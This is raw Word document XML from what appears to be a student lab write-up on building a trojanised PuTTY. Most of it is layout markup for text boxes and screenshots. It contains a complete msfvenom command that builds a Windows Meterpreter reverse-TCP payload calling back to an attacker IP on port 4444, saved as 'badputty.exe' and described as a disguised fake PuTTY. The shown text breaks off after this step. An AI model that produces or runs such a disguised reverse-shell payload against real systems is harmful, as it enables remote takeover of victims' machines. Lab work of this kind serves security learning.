                    <w:p w14:paraId="6059BFAB" w14:textId="77777777" w:rsidR="007213F3" w:rsidRDefault="007213F3" w:rsidP="007213F3">
                      <w:r w:rsidRPr="002C5E7E">
                        <w:rPr>
                          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                          <w:noProof/>
                          <w:kern w:val="0"/>
                          <w14:ligatures w14:val="none"/>
                        </w:rPr>
                        <w:drawing>
                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AB4F759" wp14:editId="2B81D1FF">
                            <wp:extent cx="1108710" cy="123190"/>
                            <wp:effectExtent l="0" t="0" r="0" b="0"/>
                            <wp:docPr id="1854513390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08710" cy="1231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5E1C58E" w14:textId="1DEAB78C" w:rsidR="00482F30" w:rsidRDefault="007213F3" w:rsidP="00806273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B739B3E" wp14:editId="5AB18088">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3482340</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>180340</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2362200" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="19050" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="99688845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304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CCB9F90" w14:textId="798438C5" w:rsidR="007213F3" w:rsidRPr="008A5EBE" w:rsidRDefault="008A5EBE" w:rsidP="007213F3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14:ligatures w14:val="none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14:ligatures w14:val="none"/>
                              </w:rPr>
                              <w:t xml:space="preserve">                       </w:t>
                            </w:r>
                            <w:r w:rsidRPr="008A5EBE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14:ligatures w14:val="none"/>
                              </w:rPr>
                              <w:t>Hostname</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5AB54F32" w14:textId="77777777" w:rsidR="007213F3" w:rsidRDefault="007213F3" w:rsidP="007213F3">
                            <w:r w:rsidRPr="002C5E7E">
                              <w:rPr>
                                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                                <w:noProof/>
                                <w:kern w:val="0"/>
                                <w14:ligatures w14:val="none"/>
                              </w:rPr>
                              <w:drawing>
                                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EC6CDA6" wp14:editId="2BCC4AD3">
                                  <wp:extent cx="1108710" cy="123190"/>
                                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                                  <wp:docPr id="2052424857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08710" cy="1231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39B3E" id="_x0000_s1032" type="#_x0000_t202" style="position:absolute;margin-left:274.2pt;margin-top:14.2pt;width:186pt;height:24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" fillcolor="window" strokecolor="white [3212]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6CCB9F90" w14:textId="798438C5" w:rsidR="007213F3" w:rsidRPr="008A5EBE" w:rsidRDefault="008A5EBE" w:rsidP="007213F3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14:ligatures w14:val="none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14:ligatures w14:val="none"/>
                        </w:rPr>
                        <w:t xml:space="preserve">                       </w:t>
                      </w:r>
                      <w:r w:rsidRPr="008A5EBE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14:ligatures w14:val="none"/>
                        </w:rPr>
                        <w:t>Hostname</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5AB54F32" w14:textId="77777777" w:rsidR="007213F3" w:rsidRDefault="007213F3" w:rsidP="007213F3">
                      <w:r w:rsidRPr="002C5E7E">
                        <w:rPr>
                          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                          <w:noProof/>
                          <w:kern w:val="0"/>
                          <w14:ligatures w14:val="none"/>
                        </w:rPr>
                        <w:drawing>
                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EC6CDA6" wp14:editId="2BCC4AD3">
                            <wp:extent cx="1108710" cy="123190"/>
                            <wp:effectExtent l="0" t="0" r="0" b="0"/>
                            <wp:docPr id="2052424857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08710" cy="1231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BF6159B" w14:textId="07C94AB4" w:rsidR="00482F30" w:rsidRDefault="00581DFB" w:rsidP="00806273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17ECA15C" wp14:editId="67FF95B9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5029200</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>161925</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2186940" cy="807720"/>
            <wp:effectExtent l="57150" t="19050" r="60960" b="87630"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="-376" y="-509"/>
                <wp:lineTo x="-564" y="0"/>
                <wp:lineTo x="-564" y="22925"/>
                <wp:lineTo x="-376" y="23434"/>
                <wp:lineTo x="21826" y="23434"/>
                <wp:lineTo x="22014" y="16811"/>
                <wp:lineTo x="22014" y="8151"/>
                <wp:lineTo x="21826" y="509"/>
                <wp:lineTo x="21826" y="-509"/>
                <wp:lineTo x="-376" y="-509"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="4548749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74980" name="Picture 45487498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80772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49AC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63265F8C" wp14:editId="50438CFE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>2423160</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>66675</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1630680" cy="944880"/>
            <wp:effectExtent l="57150" t="19050" r="64770" b="102870"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="-505" y="-435"/>
                <wp:lineTo x="-757" y="0"/>
                <wp:lineTo x="-757" y="23081"/>
                <wp:lineTo x="-505" y="23516"/>
                <wp:lineTo x="21953" y="23516"/>
                <wp:lineTo x="22206" y="20903"/>
                <wp:lineTo x="22206" y="6968"/>
                <wp:lineTo x="21953" y="435"/>
                <wp:lineTo x="21953" y="-435"/>
                <wp:lineTo x="-505" y="-435"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="21103753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75372" name="Picture 211037537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94488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13F3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7AB67C59" wp14:editId="12F3825D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>175260</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5715</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1622425" cy="929640"/>
            <wp:effectExtent l="57150" t="19050" r="53975" b="99060"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="-507" y="-443"/>
                <wp:lineTo x="-761" y="0"/>
                <wp:lineTo x="-761" y="23016"/>
                <wp:lineTo x="-507" y="23459"/>
                <wp:lineTo x="21811" y="23459"/>
                <wp:lineTo x="22065" y="21246"/>
                <wp:lineTo x="22065" y="7082"/>
                <wp:lineTo x="21811" y="443"/>
                <wp:lineTo x="21811" y="-443"/>
                <wp:lineTo x="-507" y="-443"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="5759025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902520" name="Picture 57590252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425" cy="92964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50C4DB" w14:textId="4CE4FCF6" w:rsidR="00B74A40" w:rsidRDefault="00B74A40" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EC73701" w14:textId="0F88FF37" w:rsidR="00B74A40" w:rsidRDefault="00B74A40" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56C9A96B" w14:textId="41CC10F8" w:rsidR="00B74A40" w:rsidRDefault="008A5EBE" w:rsidP="00806273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E489655" wp14:editId="59573823">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2301240</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>224790</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1737360" cy="251460"/>
                <wp:effectExtent l="0" t="0" r="15240" b="15240"/>
                <wp:wrapNone/>
                <wp:docPr id="191860345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7360" cy="2514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FEABB38" w14:textId="7A0D57A3" w:rsidR="002C5E7E" w:rsidRPr="008A5EBE" w:rsidRDefault="002C5E7E" w:rsidP="002C5E7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14:ligatures w14:val="none"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="002C5E7E">
                              <w:rPr>
                                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                                <w:kern w:val="0"/>
                                <w14:ligatures w14:val="none"/>
                              </w:rPr>
                              <w:t> </w:t>
                            </w:r>
                            <w:r w:rsidR="007213F3" w:rsidRPr="008A5EBE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14:ligatures w14:val="none"/>
                              </w:rPr>
                              <w:t>Password</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6B1D5C3C" w14:textId="66A59C31" w:rsidR="002C5E7E" w:rsidRDefault="002C5E7E" w:rsidP="002C5E7E">
                            <w:r w:rsidRPr="002C5E7E">
                              <w:rPr>
                                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                                <w:noProof/>
                                <w:kern w:val="0"/>
                                <w14:ligatures w14:val="none"/>
                              </w:rPr>
                              <w:drawing>
                                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FE85D0F" wp14:editId="3046DE9E">
                                  <wp:extent cx="1108710" cy="123190"/>
                                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                                  <wp:docPr id="793067187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08710" cy="1231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spellStart"/>
                            <w:r w:rsidR="007213F3">
                              <w:t>Paas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89655" id="_x0000_s1033" type="#_x0000_t202" style="position:absolute;margin-left:181.2pt;margin-top:17.7pt;width:136.8pt;height:19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" fillcolor="window" strokecolor="white [3212]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7FEABB38" w14:textId="7A0D57A3" w:rsidR="002C5E7E" w:rsidRPr="008A5EBE" w:rsidRDefault="002C5E7E" w:rsidP="002C5E7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14:ligatures w14:val="none"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="002C5E7E">
                        <w:rPr>
                          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                          <w:kern w:val="0"/>
                          <w14:ligatures w14:val="none"/>
                        </w:rPr>
                        <w:t> </w:t>
                      </w:r>
                      <w:r w:rsidR="007213F3" w:rsidRPr="008A5EBE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14:ligatures w14:val="none"/>
                        </w:rPr>
                        <w:t>Password</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6B1D5C3C" w14:textId="66A59C31" w:rsidR="002C5E7E" w:rsidRDefault="002C5E7E" w:rsidP="002C5E7E">
                      <w:r w:rsidRPr="002C5E7E">
                        <w:rPr>
                          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                          <w:noProof/>
                          <w:kern w:val="0"/>
                          <w14:ligatures w14:val="none"/>
                        </w:rPr>
                        <w:drawing>
                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FE85D0F" wp14:editId="3046DE9E">
                            <wp:extent cx="1108710" cy="123190"/>
                            <wp:effectExtent l="0" t="0" r="0" b="0"/>
                            <wp:docPr id="793067187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08710" cy="1231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proofErr w:type="spellStart"/>
                      <w:r w:rsidR="007213F3">
                        <w:t>Paas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ECAF34E" wp14:editId="3948926A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4312920</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>300990</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2179320" cy="281940"/>
                <wp:effectExtent l="0" t="0" r="11430" b="22860"/>
                <wp:wrapNone/>
                <wp:docPr id="19474601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9320" cy="2819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62CD1E9" w14:textId="7121CF94" w:rsidR="002C5E7E" w:rsidRPr="008A5EBE" w:rsidRDefault="002C5E7E" w:rsidP="002C5E7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14:ligatures w14:val="none"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="008A5EBE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14:ligatures w14:val="none"/>
                              </w:rPr>
                              <w:t> </w:t>
                            </w:r>
                            <w:r w:rsidR="007213F3" w:rsidRPr="008A5EBE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14:ligatures w14:val="none"/>
                              </w:rPr>
                              <w:t>New file cr</w:t>
                            </w:r>
                            <w:r w:rsidR="001275CE" w:rsidRPr="008A5EBE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14:ligatures w14:val="none"/>
                              </w:rPr>
                              <w:t>ea</w:t>
                            </w:r>
                            <w:r w:rsidR="007213F3" w:rsidRPr="008A5EBE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14:ligatures w14:val="none"/>
                              </w:rPr>
                              <w:t>ted</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="707DB873" w14:textId="77777777" w:rsidR="002C5E7E" w:rsidRDefault="002C5E7E" w:rsidP="002C5E7E">
                            <w:r w:rsidRPr="002C5E7E">
                              <w:rPr>
                                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                                <w:noProof/>
                                <w:kern w:val="0"/>
                                <w14:ligatures w14:val="none"/>
                              </w:rPr>
                              <w:drawing>
                                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BA5EB23" wp14:editId="073A95C1">
                                  <wp:extent cx="1108710" cy="123190"/>
                                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                                  <wp:docPr id="128483040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08710" cy="1231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AF34E" id="_x0000_s1034" type="#_x0000_t202" style="position:absolute;margin-left:339.6pt;margin-top:23.7pt;width:171.6pt;height:22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" fillcolor="window" strokecolor="white [3212]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="362CD1E9" w14:textId="7121CF94" w:rsidR="002C5E7E" w:rsidRPr="008A5EBE" w:rsidRDefault="002C5E7E" w:rsidP="002C5E7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14:ligatures w14:val="none"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="008A5EBE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14:ligatures w14:val="none"/>
                        </w:rPr>
                        <w:t> </w:t>
                      </w:r>
                      <w:r w:rsidR="007213F3" w:rsidRPr="008A5EBE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14:ligatures w14:val="none"/>
                        </w:rPr>
                        <w:t>New file cr</w:t>
                      </w:r>
                      <w:r w:rsidR="001275CE" w:rsidRPr="008A5EBE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14:ligatures w14:val="none"/>
                        </w:rPr>
                        <w:t>ea</w:t>
                      </w:r>
                      <w:r w:rsidR="007213F3" w:rsidRPr="008A5EBE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14:ligatures w14:val="none"/>
                        </w:rPr>
                        <w:t>ted</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="707DB873" w14:textId="77777777" w:rsidR="002C5E7E" w:rsidRDefault="002C5E7E" w:rsidP="002C5E7E">
                      <w:r w:rsidRPr="002C5E7E">
                        <w:rPr>
                          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                          <w:noProof/>
                          <w:kern w:val="0"/>
                          <w14:ligatures w14:val="none"/>
                        </w:rPr>
                        <w:drawing>
                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BA5EB23" wp14:editId="073A95C1">
                            <wp:extent cx="1108710" cy="123190"/>
                            <wp:effectExtent l="0" t="0" r="0" b="0"/>
                            <wp:docPr id="128483040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08710" cy="1231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C5E7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7A2ED6A" wp14:editId="5C3A4087">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>93345</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2362200" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="19050" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="15592340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304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895F187" w14:textId="21F45710" w:rsidR="002C5E7E" w:rsidRPr="008A5EBE" w:rsidRDefault="002C5E7E" w:rsidP="002C5E7E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14:ligatures w14:val="none"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="008A5EBE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14:ligatures w14:val="none"/>
                              </w:rPr>
                              <w:t> </w:t>
                            </w:r>
                            <w:r w:rsidR="007213F3" w:rsidRPr="008A5EBE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14:ligatures w14:val="none"/>
                              </w:rPr>
                              <w:t>Username</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3B5FB690" w14:textId="77777777" w:rsidR="002C5E7E" w:rsidRDefault="002C5E7E" w:rsidP="002C5E7E">
                            <w:r w:rsidRPr="002C5E7E">
                              <w:rPr>
                                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                                <w:noProof/>
                                <w:kern w:val="0"/>
                                <w14:ligatures w14:val="none"/>
                              </w:rPr>
                              <w:drawing>
                                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23F6AB25" wp14:editId="49106CFA">
                                  <wp:extent cx="1108710" cy="123190"/>
                                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                                  <wp:docPr id="2076197940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08710" cy="1231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2ED6A" id="_x0000_s1035" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:7.35pt;width:186pt;height:24pt;z-index:2516766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" fillcolor="window" strokecolor="white [3212]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4895F187" w14:textId="21F45710" w:rsidR="002C5E7E" w:rsidRPr="008A5EBE" w:rsidRDefault="002C5E7E" w:rsidP="002C5E7E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14:ligatures w14:val="none"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="008A5EBE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14:ligatures w14:val="none"/>
                        </w:rPr>
                        <w:t> </w:t>
                      </w:r>
                      <w:r w:rsidR="007213F3" w:rsidRPr="008A5EBE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14:ligatures w14:val="none"/>
                        </w:rPr>
                        <w:t>Username</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3B5FB690" w14:textId="77777777" w:rsidR="002C5E7E" w:rsidRDefault="002C5E7E" w:rsidP="002C5E7E">
                      <w:r w:rsidRPr="002C5E7E">
                        <w:rPr>
                          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                          <w:noProof/>
                          <w:kern w:val="0"/>
                          <w14:ligatures w14:val="none"/>
                        </w:rPr>
                        <w:drawing>
                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23F6AB25" wp14:editId="49106CFA">
                            <wp:extent cx="1108710" cy="123190"/>
                            <wp:effectExtent l="0" t="0" r="0" b="0"/>
                            <wp:docPr id="2076197940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08710" cy="1231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EA7925" w14:textId="20218A87" w:rsidR="00B74A40" w:rsidRDefault="002C5E7E" w:rsidP="00806273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07225883" wp14:editId="499FC90A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>100330</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1927225" cy="441960"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20483"/>
                <wp:lineTo x="21351" y="20483"/>
                <wp:lineTo x="21351" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="21220744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74498" name="Picture 212207449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743" cy="443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67CB373" w14:textId="5598502E" w:rsidR="00B74A40" w:rsidRDefault="00B74A40" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F70639C" w14:textId="1EFC7684" w:rsidR="00E02D55" w:rsidRPr="003D6403" w:rsidRDefault="00E960A6" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Putty in kal</w:t>
      </w:r>
      <w:r w:rsidR="004526C0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D68E1A" w14:textId="50A61B41" w:rsidR="00806273" w:rsidRPr="000D5329" w:rsidRDefault="00806273" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D5329">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="00511A6C" w:rsidRPr="000D5329">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="000D5329">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>: Create the Malicious File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73ECD90B" w14:textId="6E4C60B4" w:rsidR="00806273" w:rsidRPr="000D5329" w:rsidRDefault="00806273" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D46A37">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D46A37">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D46A37">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> to create a disguised .exe file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD3A61D" w14:textId="77777777" w:rsidR="00806273" w:rsidRPr="00E22305" w:rsidRDefault="00806273" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E22305">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5220EF" w14:textId="2EEE794D" w:rsidR="00806273" w:rsidRPr="00E22305" w:rsidRDefault="00806273" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E22305">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E22305">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E22305">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E22305">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E22305">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E22305">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST=192.168.</w:t>
      </w:r>
      <w:r w:rsidR="007C15BA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1.30</w:t>
      </w:r>
      <w:r w:rsidRPr="00E22305">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> LPORT=4444 -f exe -o badputty.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B6E65E" w14:textId="1A5BAFC0" w:rsidR="00806273" w:rsidRPr="00E22305" w:rsidRDefault="00806273" w:rsidP="00E22305">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E22305">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LHOST: IP address of attacker (Kali)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB06A23" w14:textId="6456234F" w:rsidR="00806273" w:rsidRPr="00E22305" w:rsidRDefault="00806273" w:rsidP="00E22305">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E22305">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LPORT: Listening port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0963C1B3" w14:textId="1344CE7C" w:rsidR="00806273" w:rsidRPr="00E22305" w:rsidRDefault="00CE1D03" w:rsidP="00E22305">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11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0279CCA8" wp14:editId="2464277E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3249930</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>368300</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3414056" cy="640135"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21214"/>
                <wp:lineTo x="21455" y="21214"/>
                <wp:lineTo x="21455" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="5159777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977775" name="Picture 51597777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89984" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7B82E079" wp14:editId="583FD891">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-38100</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>403860</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3246401" cy="685859"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21000"/>
                <wp:lineTo x="21423" y="21000"/>
                <wp:lineTo x="21423" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="6595176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17641" name="Picture 65951764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6273" w:rsidRPr="00E22305">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>badputty.exe: Output file (fake PuTTY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A920D86" w14:textId="5BB39415" w:rsidR="00806273" w:rsidRDefault="00806273" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="567A9A99" w14:textId="77777777" w:rsidR="004526C0" w:rsidRPr="00E22305" w:rsidRDefault="004526C0" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="599FAE4B" w14:textId="20E1F904" w:rsidR="00806273" w:rsidRPr="000D5329" w:rsidRDefault="00806273" w:rsidP="00806273">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
